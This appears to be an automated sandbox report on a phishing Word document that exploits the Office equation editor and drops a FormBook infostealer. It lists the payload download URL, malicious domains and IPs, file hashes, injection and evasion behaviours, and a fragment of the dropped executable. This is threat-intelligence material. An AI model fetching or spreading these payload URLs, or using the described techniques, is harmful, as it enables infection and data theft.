          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491373 Sample: Proforma invoice.doc Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 37 www.visionandcourage.com 2->37 39 td-balancer-euw2-6-109.wixdns.net 2->39 41 3 other IPs or domains 2->41 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 15 other signatures 2->63 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 23 2->16         started        signatures3 process4 dnsIp5 49 fantecheo.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 11->49 33 C:\Users\user\AppData\...\ibefrankhq4862.exe, PE32 11->33 dropped 35 C:\Users\user\AppData\...\ibefrankzx[1].exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 ibefrankhq4862.exe 1 5 11->18         started        file6 signatures7 process8 signatures9 51 Multi AV Scanner detection for dropped file 18->51 53 Tries to detect virtualization through RDTSC time measurements 18->53 55 Injects a PE file into a foreign processes 18->55 21 ibefrankhq4862.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 43 www.urbantennis.info 24->43 45 www.lazyguysmarketing.com 24->45 47 lazyguysmarketing.com 34.98.99.30, 49166, 80 GOOGLEUS United States 24->47 73 System process connects to network (likely due to code injection or exploit) 24->73 28 wininit.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Proforma invoice.doc27%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe13%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Roaming\ibefrankhq4862.exe13%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.ibefrankhq4862.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          www.handelsbetriebposavec.com/if60/0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.lazyguysmarketing.com/if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://fantecheo.tk/ibefrankzx.exe100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          td-balancer-euw2-6-109.wixdns.net
          		35.246.6.109
          		truetrue
            		unknown
            lazyguysmarketing.com
            		34.98.99.30
            		truefalse
              		unknown
              fantecheo.tk
              		185.239.243.112
              		truetrue
                		unknown
                www.urbantennis.info
                		unknown
                		unknowntrue
                  		unknown
                  www.visionandcourage.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.lazyguysmarketing.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      www.handelsbetriebposavec.com/if60/true
                      • Avira URL Cloud: safe
                      		low
                      http://www.lazyguysmarketing.com/if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTzfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://fantecheo.tk/ibefrankzx.exetrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://investor.msn.comexplorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.rspb.org.uk/wildlife/birdguide/name/ibefrankhq4862.exe, ibefrankhq4862.exe, 00000005.00000002.449302089.00000000013A2000.00000020.00020000.sdmp, wininit.exe, 00000007.00000002.668531899.00000000002B0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpfalse
                              		high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.msn.com/?ocid=iehp=0explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpfalse
                                		high
                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.msn.com/?ocid=iehpLh-explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpfalse
                                    		high
                                    Http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpfalse
                                      		high
                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://treyresearch.netexplorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.492146934.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.425752523.0000000003D90000.00000004.00000001.sdmpfalse
                                          		high
                                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpfalse
                                            		high
                                            http://java.sun.comexplorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmpfalse
                                              		high
                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpfalse
                                                		high
                                                http://investor.msn.com/explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpfalse
                                                  		high
                                                  http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.%s.comPAexplorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668831534.0000000001F00000.00000002.00020000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://support.mozilla.orgexplorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpfalse
                                                          		high
                                                          http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.436720944.0000000003E50000.00000002.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          185.239.243.112
                                                          		fantecheo.tkMoldova Republic of
                                                          		55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                                          34.98.99.30
                                                          		lazyguysmarketing.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491373
                                                          Start date:27.09.2021
                                                          Start time:14:24:49
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 16s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:Proforma invoice.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Number of analysed new started processes analysed:10
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.expl.evad.winDOC@9/8@5/2
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 11.6% (good quality ratio 11.3%)
                                                          • Quality average: 74.3%
                                                          • Quality standard deviation: 26.2%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491373/sample/Proforma invoice.doc

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          14:25:16API Interceptor32x Sleep call for process: EQNEDT32.EXE modified
                                                          14:25:17API Interceptor69x Sleep call for process: ibefrankhq4862.exe modified
                                                          14:25:39API Interceptor172x Sleep call for process: wininit.exe modified
                                                          14:26:43API Interceptor1x Sleep call for process: explorer.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          185.239.243.112J21021 TUBI PER QUALIFICHE.docGet hashmaliciousBrowse
                                                          • xleetaz.xyz/prison/ikk.exe
                                                          RFQ9003930 New Order.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/harshmanzx.exe
                                                          WELDED PIPES - Bid No 2000543592- PR.docGet hashmaliciousBrowse
                                                          • xleetaz.xyz/prison/sam.exe
                                                          AWB.docGet hashmaliciousBrowse
                                                          • fantecheo.tk/famzlogszx.exe
                                                          New Order.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/bulizx.exe
                                                          DO526.docGet hashmaliciousBrowse
                                                          • fantecheo.tk/famzlogszx.exe
                                                          24-09-2021 LETTER OF INTENT.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/bankzx.exe
                                                          DHL#AWB#29721.docGet hashmaliciousBrowse
                                                          • fantecheo.tk/princezx.exe
                                                          PO2021.docGet hashmaliciousBrowse
                                                          • fantecheo.tk/ibefrankzx.exe
                                                          PON507991 Copy.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/bryantzx.exe
                                                          OUTSTANDING PAYMENT.docGet hashmaliciousBrowse
                                                          • xleetaz.xyz/benx/nd.exe
                                                          New Order.docGet hashmaliciousBrowse
                                                          • xleetaz.xyz/benx/bd.exe
                                                          Proforma Invoice 28093.docGet hashmaliciousBrowse
                                                          • xleetaz.xyz/benx/sy.exe
                                                          BL UALBHHOU1.docGet hashmaliciousBrowse
                                                          • xleetaz.xyz/benx/mb.exe
                                                          Pedido 20839.docGet hashmaliciousBrowse
                                                          • fantecheo.tk/chungzx.exe
                                                          catalogue.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/shakitizx.exe
                                                          SWIFT.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/obizx.exe
                                                          TU22.docGet hashmaliciousBrowse
                                                          • fantecheo.tk/famzlogszx.exe
                                                          AVB CMAU6526450 40HC COI2100105.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/bluezx.exe
                                                          Paid Invoices.docGet hashmaliciousBrowse
                                                          • lg-tv.tk/atlaszx.exe

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          td-balancer-euw2-6-109.wixdns.net$$$.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          PAYMENT COPY.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          RFQ.docGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          payment..exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          KOC.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          CtNh3b5Jo5.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          DATATRANSFER2021.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          ryfAIJHmKETyAPz.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          prueba23.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          prueba22.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          triage_dropped_file.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          pay $.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          Draft copy.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          hyfzRJF133.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          DLT_85620000107.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          BahcfFNy25bmV1c.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          DUE INVOICES.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          PO9887655.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          Payment Copy.exeGet hashmaliciousBrowse
                                                          • 35.246.6.109
                                                          fantecheo.tkAWB.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          DO526.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          DHL#AWB#29721.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          PO2021.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Pedido 20839.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          TU22.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          DHLAWB29721.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          KOC.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Overseas Keys inquiry.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          MT103-6793029471938.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          NEW INVOICE.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Payment reciept.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          aaaaaa.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Qoutation for Strips.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          KOC 2021.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          famz13 3.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          8765998RQF.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Quotation Required PO3652.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Shipment Document BL,INV and packing list.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          DHL-AWD6909800855.docGet hashmaliciousBrowse
                                                          • 185.239.243.112

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          CLOUDIE-AS-APCloudieLimitedHKJ21021 TUBI PER QUALIFICHE.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          RFQ9003930 New Order.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          WELDED PIPES - Bid No 2000543592- PR.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          AWB.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          New Order.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          DO526.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          24-09-2021 LETTER OF INTENT.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          IKpep4Zn5S.exeGet hashmaliciousBrowse
                                                          • 45.119.53.93
                                                          DHL#AWB#29721.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          PO2021.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          PON507991 Copy.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          OUTSTANDING PAYMENT.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          New Order.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Proforma Invoice 28093.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          BL UALBHHOU1.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          Pedido 20839.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          eJRGpI4A6d.exeGet hashmaliciousBrowse
                                                          • 45.119.53.93
                                                          catalogue.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          SWIFT.docGet hashmaliciousBrowse
                                                          • 185.239.243.112
                                                          TU22.docGet hashmaliciousBrowse
                                                          • 185.239.243.112

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):863744
                                                          Entropy (8bit):6.787269024335101
                                                          Encrypted:false
                                                          SSDEEP:12288:b3Q2cI8GAKaohwnRZHDA7Mg+SvqwpCR9KDfagVeZ3yYxNEi09I/pRYh7pzWjNhc/:GdIF9YPUu0RPDsu/eE/LQzKhF+va+G
                                                          MD5:7572FBC5DE30359E833D6F382DB286FA
                                                          SHA1:24B8DF7EF119A0282F39A4F8F589DAFC64E1D28C
                                                          SHA-256:1758A9B18032CE82F4E95249413EE1A8CBADE1EF2CB773BC958502801F3AF738
                                                          SHA-512:6F5388CF81CE66DA16F93CB61487F016AE230FBA357C961B36EDAB324DD31A54CD239CA1B74214DA4CD2754AFA686BA10CF82F30339E0712E9173A2EF1ED141E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Reputation:low
                                                          IE Cache URL:http://fantecheo.tk/ibefrankzx.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.............f.... ........@.. ....................................@.....................................O.......T....................`....................................................... ............... ..H............text...l.... ...................... ..`.rsrc...T...........................@..@.reloc.......`.......,..............@..B................H.......H............S............................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{207906E3-995B-4984-95CE-8C9C4EA99CC3}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):3.3009239505533103
                                                          Encrypted:false
                                                          SSDEEP:96:G+Gj8BbEEOCZxJjcMarcJhZ4C4d7g9GyoXcEXuG:G+Gj8C/CZvwMccJhgd7gho/Xf
                                                          MD5:DF19F9BB800EE82E193EF7EA784FC3C8
                                                          SHA1:5E4F036F85194A836272D477B62EE362956F7887
                                                          SHA-256:7F9F3E4E1913990ADB74CD502823C1159F960BD50578F6AFE9BAF559817E4D6A
                                                          SHA-512:5D6F6BF461E0B088BEE6CAAE0F4FB68487C749279CC1F7356DC0456BB5AD6DFB37C92DBEF7CAE342024D6DAD5614272C8968475738F3CA386ECFA89A3F6CC5E3
                                                          Malicious:false
